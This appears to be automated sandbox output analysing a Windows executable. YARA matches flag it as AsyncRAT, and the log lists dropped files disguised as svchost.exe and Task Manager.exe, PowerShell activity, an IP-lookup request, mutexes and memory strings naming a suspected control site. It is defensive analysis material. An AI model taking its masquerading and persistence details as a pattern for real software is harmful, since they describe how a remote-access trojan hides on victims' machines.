Source: Yara match; File source: 4.0.Task Manager.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.All function.cmd.2eafcc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Roaming\Task Manager.exe, type: DROPPED
Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 208.95.112.1
Source: unknown; DNS query: name: ip-api.com
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
Source: powershell.exe, 0000000A.00000002.2601444974.00000239A61A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m)IZ_
Source: powershell.exe, 0000000A.00000002.2601444974.00000239A61DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros
Source: dLRcE11Dkl.exe, 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, All function.cmd, 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp, Task Manager.exe, 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp, All function.exe, 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, BLACKGODDOM V.2 GOD BY LA.exe, 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, BLACKGODDOM V.2 GOD BY LA.exe.5.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000008.00000002.2476803020.00000251EABBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2520111925.000002399DBDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2327603396.000001A74D26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2840317416.0000023B539BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3249961564.000001C4BB09C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3354387858.000001F4DA2EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.2285781338.00000251DAD79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2297819455.000002398DD99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2270854842.000001A73D429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2436831061.0000023B43B7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2672516135.000001C4AB25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2735488760.000001F4CA4A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000008.00000002.2285781338.00000251DAB51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2297819455.000002398DB71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2270854842.000001A73D201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2436831061.0000023B43951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2672516135.000001C4AB031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2735488760.000001F4CA281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3112040346.000002D65E481000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.2285781338.00000251DAD79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2297819455.000002398DD99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2270854842.000001A73D429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2436831061.0000023B43B7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2672516135.000001C4AB25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2735488760.000001F4CA4A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167495504.00007FF7720B5000.00000008.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000015.00000002.3481943443.000001F4E2A33000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000008.00000002.2285781338.00000251DAB51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2297819455.000002398DB71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2270854842.000001A73D201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2436831061.0000023B43951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2672516135.000001C4AB031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2735488760.000001F4CA281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3112040346.000002D65E481000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp, Ratty_win32_directx11.exe.5.dr | String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: https://discord.gg/sGNBaJSzYD
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: https://discord.gg/sGNBaJSzYDstart
Source: powershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167495504.00007FF7720B5000.00000008.00000001.01000000.0000000A.sdmp | String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
Source: powershell.exe, 00000008.00000002.2476803020.00000251EABBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2520111925.000002399DBDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2327603396.000001A74D26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2840317416.0000023B539BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3249961564.000001C4BB09C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3354387858.000001F4DA2EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: https://qualityboy.rdcw.xyz/
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: https://qualityboy.rdcw.xyz/Rat
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167495504.00007FF7720B5000.00000008.00000001.01000000.0000000A.sdmp | String found in binary or memory: https://scripts.sil.org/OFLThis
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167495504.00007FF7720B5000.00000008.00000001.01000000.0000000A.sdmp | String found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: All function.exe PID: 1472, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: BLACKGODDOM V.2 GOD BY LA.exe PID: 5492, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED

                        System Summary

Source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.All function.cmd.2eafcc0.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.All function.cmd.2ec0300.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.0.svchost.exe.a20000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.All function.cmd.2ec0300.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.0.Task Manager.exe.3b0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.All function.cmd.2eafcc0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Task Manager.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\All function.exe | Code function: 5_2_00007FFD34780A21
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD34769EF3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD3476947D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD34768E05
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD34763572
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD34765EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD34762715
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD3476AB15
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD34765BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD3476B808
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD347A5CFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD347A34FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD347A6081
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD347A89B5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD347A26A3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD34798E05
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD34795EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD347982C5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD347926D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD34790ED3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD34795BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD3479BBFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFD347834FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFD34785CFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFD347825ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFD347889F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFD34789E01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFD3478B9BA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFD347836D2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFD34785BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FFD34778EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FFD3477BA6A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FFD3477ABF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FFD34775BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FFD3477B828
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FFD34770B9A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FFD347A84E3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FFD347A34B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FFD347A8DE5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FFD347A89F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FFD347A26F5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FFD347A9FF3
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe A9BD5014B5A6744B0A5C180A3E76FF546A514DCBAD8BF2D8C500F903A285424B
Source: dLRcE11Dkl.exe, 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesvchost.exe4 vs dLRcE11Dkl.exe
Source: dLRcE11Dkl.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.All function.cmd.2eafcc0.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.All function.cmd.2ec0300.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.0.svchost.exe.a20000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.All function.cmd.2ec0300.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.0.Task Manager.exe.3b0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.All function.cmd.2eafcc0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\Task Manager.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: dLRcE11Dkl.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: All function.cmd.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dLRcE11Dkl.exe, Wigvk0CbYCVCKiwdQW7pvcTwDKYA740FwRxw5uTWiZdauz4qml.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, 4EPW2fKcngj.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, IAdtlBkckGw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, IAdtlBkckGw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, 4EPW2fKcngj.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, IAdtlBkckGw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, IAdtlBkckGw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, 4EPW2fKcngj.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, IAdtlBkckGw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, IAdtlBkckGw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Task Manager.exe.2.dr, DPEF9ZxDQwL.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Task Manager.exe.2.dr, DPEF9ZxDQwL.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: Task Manager.exe.2.dr, 2syffmJ1FUx.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: Task Manager.exe.2.dr, 2syffmJ1FUx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: svchost.exe.0.dr, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: svchost.exe.0.dr, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.evad.winEXE@34/38@1/1
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | File created: C:\Users\user\AppData\Roaming\All function.cmd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3968:120:WilError_03
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Mutant created: \Sessions\1\BaseNamedObjects\3ermCMaZELzglIX9h
Source: C:\Users\user\AppData\Roaming\All function.cmd | Mutant created: \Sessions\1\BaseNamedObjects\6rWANPTakrMgPn7DP
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe | Mutant created: \Sessions\1\BaseNamedObjects\NvsfH1XO1syyGREn
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4540:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3260:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:120:WilError_03
Source: C:\Users\user\AppData\Roaming\All function.exe | Mutant created: \Sessions\1\BaseNamedObjects\prHEBzICljIZgj9Vw
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Mutant created: \Sessions\1\BaseNamedObjects\QGqDlUGtPZEL9zvP
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3172:120:WilError_03
Source: C:\Users\user\AppData\Roaming\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\d8q1JAoTE3NwBrSB
Source: C:\Users\user\AppData\Roaming\All function.exe | File created: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe
Source: dLRcE11Dkl.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dLRcE11Dkl.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: dLRcE11Dkl.exe | ReversingLabs: Detection: 68%
Source: unknown | Process created: C:\Users\user\Desktop\dLRcE11Dkl.exe "C:\Users\user\Desktop\dLRcE11Dkl.exe"
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Process created: C:\Users\user\AppData\Roaming\All function.cmd "C:\Users\user\AppData\Roaming\All function.cmd"
